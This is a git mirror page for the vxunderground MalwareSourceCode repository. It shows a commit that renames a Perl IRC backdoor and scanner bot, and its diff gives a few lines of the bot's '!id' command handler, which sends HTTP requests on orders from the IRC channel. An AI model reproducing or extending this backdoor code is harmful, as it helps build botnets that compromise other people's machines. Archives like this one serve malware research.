mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 09:26:09 +00:00
Rename Backdoor.Perl.IRCBot.t to Backdoor.Perl.IRCBot.Scanner.tc
This commit is contained in:
parent
e0b5cd251d
commit
5cc5054079
@ -107,7 +107,7 @@ while ( $line = <$dsp> ) {
|
||||
}
|
||||
|
||||
if ( $line =~ /PRIVMSG $channel :!id/ )
|
||||
{ ## ©© Script made by princeteam1979 . Don't remove this comment !
|
||||
{ ## ©© Script made by princeteam1979 . Don't remove this comment !
|
||||
my $testid = $id;
|
||||
my $req = HTTP::Request->new( GET => $testid );
|
||||
my $ua = LWP::UserAgent->new();
|
Loading…
Reference in New Issue
Block a user